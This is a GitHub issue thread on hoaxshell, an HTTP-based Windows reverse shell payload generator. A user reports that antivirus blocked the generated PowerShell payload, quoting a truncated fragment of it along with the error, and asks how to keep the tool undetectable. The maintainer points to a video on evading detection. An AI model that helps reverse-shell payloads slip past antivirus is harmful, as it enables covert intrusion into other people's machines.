search

t3l3machus / hoaxshell

A Windows reverse shell payload generator and handler that abuses the http(s) protocol to establish a beacon-like reverse shell.
BSD 2-Clause "Simplified" License
3.05k stars 482 forks source link

Detected by antivirus!! #50

Closed Divinemonk closed 1 year ago

Divinemonk commented 1 year ago

I tried to run the powershell -e * generated by hoaxshell, but it returned this error:

At line:1 char:1
+
$s='*.*.*.*:8080';$i='c55b3450-03c33f0f-4e17c4ce';$p='http://';$v
...
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
This script contains malicious content and has been blocked by your
antivirus software.
    + CategoryInfo          : ParserError: (:) [], ParentContainsError
   RecordException
    + FullyQualifiedErrorId : ScriptContainedMaliciousContent

The sole purpose of hoaxshell is been undetectable, is there any way this could be fixed (or now antivirus has got footprint of hoaxshell)!?

t3l3machus commented 1 year ago

Open source malware stuff will always end up being detected. Here's how to deal with it: https://www.youtube.com/watch?v=grSBdZdUya0

Divinemonk commented 1 year ago

Thank you :)